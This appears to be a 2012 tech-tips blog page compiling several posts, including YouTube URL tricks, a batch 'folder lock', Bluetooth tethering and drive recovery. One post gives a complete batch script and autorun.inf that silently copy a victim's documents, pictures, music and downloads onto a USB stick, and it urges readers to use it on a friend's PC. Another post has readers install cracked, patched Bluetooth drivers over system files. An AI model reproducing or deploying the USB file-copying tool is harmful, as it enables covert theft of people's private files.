Friday, May 18, 2012

2 very useful YouTube hacks

Do you utilize YouTube to host videos you create and want to share with the world at the best quality? Has someone else created a YouTube video, but you are only interested in a portion of it for your blog or website? Here are 2 tips that help ensure your audience has a better YouTube expereince:
Tip 1. Forcing the browser to use the High Quality version of the video
You may notice just under the lower right coner of the video window, some videos have an option to “Watch In High Quality”. By default, these videos will play as a 320×240 FLV file at 320Kb/s. Check out this sample:
The user could click on this link to “Watch in High Quality” which will reload the video and play the MP4 version , which is 480×360 at 512Kb/s. By adding &fmt=18 to the end of the URL, you’ll make the URL you share with others bring them right to the high quality version. Here’s the same video in the High Quality view:
What else are you gaining besides increased video resolution? The video is compressed with H.264 compression, so you get better video even at the same data rate. You also go from a low fidelity mono audio feed to stereo @ 44.1Khz sample rate.
&fmt=6 increases the resolution from 320×240 to 448×336, Flash 7 video @ 900Kbps; audio @ 44.1KHz 96Kbps Mono CBR.
&fmt=18 increases the resolution to 480×360, H.264 video @ 512Kbps; audio @ 44.1KHz 128Kbps Stereo. Note, the bandwidth may be lower, but it’s utilizing a more efficient compression codec.
UPDATE: &fmt=22 increaes the resolution to 720p HD video if the source was uploaded at a high enough resolution.
Tip 2. Advancing the video to a specific playback point.
If you evern wanted to link to a video in YouTube that was lengthy, but had a very interesting part partway through, there is a hack to allow you to begin playback at a precise time. You can specify the minutes and seconds of the start time like this:
add #t=53s to the end of the URL to start at 53 seconds into it:
add #t=1m57s to the end of the video URL to start playback at 1 minute 57 seconds:
Think of this as bookmarking your video clips! Now you can link to a video, and have an index of the segments included, which link right to that precise moment!

How to create a folder lock without any software

Hi there,
Here are some easy step to create a folderlock with out any software

follow the instructions its a helpful trick

1.copy the code given bellow

2.open a notepad and paste it then 'Save' it as batch file (with extension '.bat').
for example :lock file.bat

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End

3.Then you see a batch file. Double click on this batch file then i will automatic to create a folder name locker.

4.New folder named 'Locker' would be formed at the same location.

5.Now open the folder then you can store all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder name'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.
Enjoy ^^

Free online on your phone via bluetooth

This phone works on nearly all Sony Ericsson Phone, I am not sure regarding others.

You need :

A. Widcomm v5.0.1.2500 drivers
http://rapidshare.com/files/151128972/Widcomm.v5.0.1.2500.Incl.Patch.rar

B. DHCP server
http://rapidshare.com/files/151128815/dhcpsrv1.5.rar

-----------------------------------------------------------------------------
On Windows Vista
After you install Widcomm bluetooth driver with right click run as administrator copy BTNeighborhood.dll & wbtapi.dll from WIN/system32 and patch them elsewhere, after that reboot and enter in safe mod with comand prompt and in the cmd write: del BTNeighborhood.dll & del wbtapi.dll after that open task manager and run explorer.exe then copy your patched BTNeighborhood.dll & wbtapi.dll in WIN/system32, reboot in normal mode and follow all the steps.

Note:
Run Widcomm_patcher_v2.exe with right click run as administrator to patch widcomm.
-----------------------------------------------------------------------------
On Windows XP
After installing Widcomm drivers, run Widcomm_patcher_v2.exe in safe mode and patch the files it requests. Continue the tutorial back in normal mode.
-----------------------------------------------------------------------------

First you need to install Widcomm bluetooth driver and follow the instructions in the Install.txt, then go Advanced Configuration/Local Services/Network Access and select: "Allow other devices to access the Internet/LAN via this computer." After that go to Control panel /Network connections click properties on your default internet connection go to advanced tab and check "Allow other network users to connect through this computer's Internet connection." .And then your Bluetooth Network ip address will be 192.168.0.1.


Second you need to configure the DHCP server with:


1. Bluetooth Network adapter IP address after ICS (Internet Conection Sharing) with your default internet conection. (leave it like in the picture)
2. Ip address of the bluetooth network adapter address after ICS (same as 1.) (leave it like in the picture)
3. You Phone MAC address Image (capital letters)
4. Ip address for your phone (same class as the bluetooth network adapter) (if you don't use that ip in the picture you can leave it like that)
5. Network adapter for the DHCP server to listen (ip address of the bluetooth network adapter address after ICS) (same as 1.) (leave it like in the picture)

Third you need to make a new internet profile on your phone that connects to the bluetooth data account. (Settings/Connectivity/Internet settings/Internet profiles/New profile/Name (any name)/Connect using/your PC bluetooth name. Select this profile as default for Internet profiles and Settings for java .)

Last you need to connect to your computer via phone and ONLY phone from Settings/Connectivity/Bluetooth/My Devices/New device, search for your PC, pair and then click Connect (after you see Connected on your phone and PC your connected to the internet via bluetooth and your bluetooth will not disconnect after you enter and exit a application that needs a internet connection eg: Opera Mini) and every time you want to connect to the internet from your phone if your bluetooth disconnects you have to search and pair you PC from your phone and click Connect.

For this to work you have to use ICS (Internet Conection Sharing)not Bridge Connection !

Works with any phone that can connect to Bluetooth PAN (Personal Area Network), eg: SE W660/K800/K810/W850/W880/etc.

Your done have fun ! :)

PS. REMEMBER TO ADD THE DHCP SERVER ONTO YOUR FIREWALL LIST (this includes Windows Firewall)

VIDEO GUIDE - YOUTUBE
http://www.megavideo.com/?v=QCWY809I
http://uk.youtube.com/watch?v=KgRlc4jt2H0

*Sometimes when i cannot connect, i restart the DCHP server and i also i go on my network connections and i turn off and turn on internet sharing. that normally fixes the problem.

MOBILE PHONES CONFIRMED TO BE WORKING:

Sony Ericsson:
k750i
k800i
k810
k850

HTC:
HTC Touch
HTC Touch Dual 1 & 2

Control your mouse with keyboard

Mouse not work??move your mouse pointer with you keyboard
You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.

Follow the given steps to activate the keyboard mouse:

1. To edit this feature, first you should log onto your computer with administrative rights.
2. To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.
3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.
4. Click on Settings button, if you want to adjust the mouse cursor detail settings.
5. Here a new dialog box will appear with the title Settings for MouseKeys, now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.

Now using Numeric keypad, you can move your mouse pointer.

The controls are:

* 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.
* Key 5 is used as mouse click button.
* Insert key used to hold down mouse button.
* + Sign used to double click on any object.
* Delete button used to release the mouse.
* Click on NumLock button to disable this keyboard mouse feature

How to Steal people files using usb drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

How to chat with other computer using comand prompt

If you want personal chat with a friend
you don’t need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Now save this as “Messenger.bat”. Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After “User” type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press “Enter” it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press “Enter”, and start chatting!

Five tips How to restoring an unbootable hard drive

Have you ever tried to restart a machine only to find it won’t boot? For whatever reason, you get a warning message informing you that disaster might well have struck… and you’re staring in the face of what could be a very bad day. Well, don’t panic yet. There are a few tricks you can try that may get that machine booted. All is not lost until you know, with 100 percent certainty, that the drive will not boot — and even then, you can possibly recover your data. Here are some tips that can help you to get that drive booted and your machine recovered.

1: Boot from a restore disk



With many operating systems, restore disks can be created and used to deal with such disasters. The problem with this usually arises because the user hasn’t made a restore disk. I always tell users that one of the first things they should do when they get a new computer or install a fresh operating system is create a restore disk and then put it somewhere safe. That disk can really save your hide — especially in cases such as an unbootable drive. Now, every operating system approaches the restore disk differently. For example, some Linux distributions, such as Ubuntu 11.04, let you use the Live disk as a restore disk. So even if you didn’t create a restore disk, you can just download the same release that’s installed on the machine and use that as your restore.


2: Use the install disk

If you didn’t create a recovery disk in Windows, but you have the full installation disk, you’ll be okay. Those disks include recovery tools that can be accessed by pressing R at the Welcome To Setup screen. The tools let you fix boot problems, restore the hard drive from image, diagnose memory, and perform system restore. Note: The system restore typically can work only if the system restore partition is intact.

3: Get to know BartPE

There are tools… and then there is BartPE. BartPE is a huge challenge to build. But once you have it, you have a serious tool for fixing serious problems. Bart E creates a complete, preinstalled Win32 environment on your hard drive that allows you to use many of the tools available for repair. You to run check disk on your drive, which could easily solve your problem.

4: Rebuild the MBR

In many instances, the problem is a corrupt master boot record (MBR). If that’s the case, the MBR needs to be rebuilt. This process will vary, depending upon the operating system you use. With Windows 7, the necessary tool is Bootrec.exe, which can be found in the Windows Recovery Environment. If the operating system uses Grub 2 and the boot loader was lost after a Windows installation (with the intent to dual-boot), there is a tool called Grub4dos, which can certainly be a lifesaver. If no Windows environment is on the machine, grab that Live CD and you’ll have all the tools you need to rebuild your Grub boot loader. The specific tool you want is grub-install, and to rebuild the grub menu, update-grub.

5: Remove the drive

If all else fails, pull out the drive from the machine, attach it to a machine known to run, and see if the drive can be seen at all. It is possible that the reason the drive will not boot is due to physical damage. If the drive can be seen but not accessed, most likely the partition table has gone corrupt. But if the drive can’t even be seen, especially using a Linux machine to view it, the drive might well be physically damaged. If the drive can be seen and accessed, the problem is probably the MBR. I would highly recommend that at this point, you copy your data over to another drive — just in case.

What has saved you?

There are plenty of ways to recover that unbootable drive, but the techniques above have always brought me the most luck. What about you? If you’ve found a more reliable or efficient way to recover a drive that refuses to boot, share it with your fellow .